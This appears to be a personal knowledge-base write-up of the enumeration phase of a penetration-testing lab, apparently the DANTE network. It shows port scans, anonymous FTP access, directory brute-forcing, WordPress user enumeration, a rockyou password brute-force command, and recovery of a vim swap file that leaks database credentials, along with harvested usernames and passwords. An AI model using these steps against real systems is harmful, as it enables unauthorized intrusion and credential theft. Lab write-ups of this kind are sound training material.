Malleum Knowledge Base

Enumeration

4 min read

Rustscan

rustscan -a 10.10.110.100 --ulimit 5000 -- -sC -sV -oA namp -Pn
 
rustscan -a 172.16.2.5 --ulimit 5000 -- -Pn -sV --script \"'vuln'\"

Output

PORT      STATE SERVICE REASON  VERSION
21/tcp    open  ftp     syn-ack vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.14.8
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 7
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Cant get directory listing: PASV IP 172.16.1.100 is not the same as 10.10.110.100
 
 
 
22/tcp    open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 8fa2ffcf4e3eaa2bc26ff45a2ad9e9da (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCtTLxLag6I25W/4MyXLNSNylWF6JL7BB9D/wK7yPZkTK0PX62N52x788lVBYZjuBvqN2wobnG5HMZvaneZaezpyi/bLGhdnERknUixrO6efcXebZFgJx5LyHENJpP5XxBpUdrczuM3/zBY1mpeBDWTMrJQLK31Sh/RxCNOlayM/DewYZmP8KCGnB0OR/BlR3dvtBOBdbuJQn+xoL6jbPjSQzTEFO/si2OwiIb0lW+PxC8RLIXulKav9k8wIFTZOqCICfnIGGIOg1LaUUtp/qt0csEQMDnCiTdgzFyi7m9yY6t8hZGCXMR8Z9RmbH8VuPbO8mRfMIxMda+rXmE8u0KUV2YW/ICeGNzle65o01YXzI4z/yzsj0HdANxMpzyYlSbNgIEo5yyGsnNHWBun3Vd5Px4QPwy//4X3od5tfi6W6XKHxK/ZFeT8nbGyoV47ozLxOFXYeTQ72RSYKENuFmn6VLyMH/C0JXFiwV5FNFqvJgmpEM9ba/3bDznTG0QUm48=
|   256 07838eb6f7e672e965db42fdedd693ee (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIVJJ8GPg11pc5bNU14qHtur8E0nGBUzMRB+9M+jdVF/l6+zNeA9aKzsCs/tT/46e7Qb9xhfSyRpSNDa/I49FOc=
|   256 1345c5cadba6b4ae9c097d21cd9d74f4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAXEXWWafJIXJTRj8o05r1Ia4C++zzVfM7t+8MzY1cMj
 
 
 
65000/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 2 disallowed entries
|_/wordpress DANTE{Y0u_Cant_G3t_at_m3_br0!}
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Port 21 vsFTPd 3.0.3

Anonymous login allowed

ftp 10.10.110.100
anonymous
anonymous
 
passive

Enumeration

There is A Transfer directory present which has two sub directories Incoming and Outgoing

Incoming Directory

The incoming directory is having a file todo.txt

Outgoing Directory

The Directory outgoing seems to be empty.

todo.txt

  • Finalize Wordpress permission changes - PENDING
  • Update links to to utilize DNS Name prior to changing to port 80 - PENDING
  • Remove LFI vuln from the other site - PENDING
  • Reset James’ password to something more secure - PENDING
  • Harden the system prior to the Junior Pen Tester assessment - IN PROGRESS

Port 65000 http

Browsing to the website gives default apache page.

Enumeration

robots.txt

Visiting to the url http://10.10.110.100:65000/robots.txt gives us the first flag and disallowed website.

output
User-agent: Googlebot
User-agent: AdsBot-Google
Disallow: /wordpress
Disallow: DANTE{Y0u_Cant_G3t_at_m3_br0!}

feroxbuster

feroxbuster -k -u http://10.10.110.100:65000 -C 404,405,410 -m GET,POST -e -x php,html,txt
  0: running      http://10.10.110.100:65000/
  1: running      http://10.10.110.100:65000/wordpress/
  2: running      http://10.10.110.100:65000/wordpress/wp-content/
  3: running      http://10.10.110.100:65000/wordpress/wp-admin/
  4: complete     http://10.10.110.100:65000/wordpress/wp-includes/
  6: running      http://10.10.110.100:65000/icons/
 13: running      http://10.10.110.100:65000/wordpress/wp-content/plugins/
 14: running      http://10.10.110.100:65000/wordpress/wp-content/themes/
 15: complete     http://10.10.110.100:65000/wordpress/wp-admin/images/
 16: complete     http://10.10.110.100:65000/wordpress/wp-admin/js/
 17: complete     http://10.10.110.100:65000/wordpress/wp-admin/includes/
 18: complete     http://10.10.110.100:65000/wordpress/wp-admin/css/
 19: running      http://10.10.110.100:65000/wordpress/wp-admin/user/
 44: complete     http://10.10.110.100:65000/wordpress/wp-content/uploads/
224: running      http://10.10.110.100:65000/wordpress/wp-admin/network/
225: complete     http://10.10.110.100:65000/wordpress/wp-admin/maint/
289: complete     http://10.10.110.100:65000/wordpress/wp-includes/sodium_compat/
348: running      http://10.10.110.100:65000/wordpress/wp-includes/random_compat/
355: complete     http://10.10.110.100:65000/wordpress/wp-includes/customize/
368: running      http://10.10.110.100:65000/icons/small/
382: complete     http://10.10.110.100:65000/wordpress/wp-includes/ID3/
410: running      http://10.10.110.100:65000/wordpress/wp-includes/certificates/
442: complete     http://10.10.110.100:65000/wordpress/wp-includes/js/
453: complete     http://10.10.110.100:65000/wordpress/wp-includes/SimplePie/
560: running      http://10.10.110.100:65000/wordpress/wp-includes/blocks/
600: complete     http://10.10.110.100:65000/wordpress/wp-includes/images/
602: complete     http://10.10.110.100:65000/wordpress/wp-includes/IXR/
606: complete     http://10.10.110.100:65000/wordpress/wp-includes/Requests/
608: complete     http://10.10.110.100:65000/wordpress/wp-includes/theme-compat/
705: running      http://10.10.110.100:65000/wordpress/wp-includes/Text/
751: complete     http://10.10.110.100:65000/wordpress/wp-includes/css/
810: running      http://10.10.110.100:65000/wordpress/wp-includes/widgets/
816: complete     http://10.10.110.100:65000/wordpress/wp-includes/pomo/
825: complete     http://10.10.110.100:65000/wordpress/wp-includes/rest-api/

The Results of robots.txt and feroxbuster confirmed that the site running is a wordpress site.

WPSCAN

wpscan --url http://10.10.110.100:65000/wordpress --enumerate vp,u,vt,tt --verbose
Interesting results
Users found
  1. admin -wordpress
  2. james - Toyota (Wordpress)
  3. kevin
  4. balthazar : TheJoker12345! (NIX01)
  5. AJ
  6. Nathan
  7. shaun : password

Looking at the todo.txt found in the FTP the james user should have a weak password and the site should consist of LFI

Bruteforce
wpscan --url http://10.10.110.100:65000/wordpress --passwords /usr/share/wordlists/rockyou.txt
Results

It gave us the location of a wp-config.php swp file but It was too slow to crack the password.

Opening the file showed us that it is a vim swap file.

Recovering vim swp file
vim -r wp-config.php.swp
:w wp-config.php
Loot
/** MySQL database username */
define( 'DB_USER', 'shaun' );
 
/** MySQL database password */
define( 'DB_PASSWORD', 'password' );
 
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
 
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
 
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

Browsing the website

Browsing the website showed some more users which I am adding in the list above from user number 3.

Graph View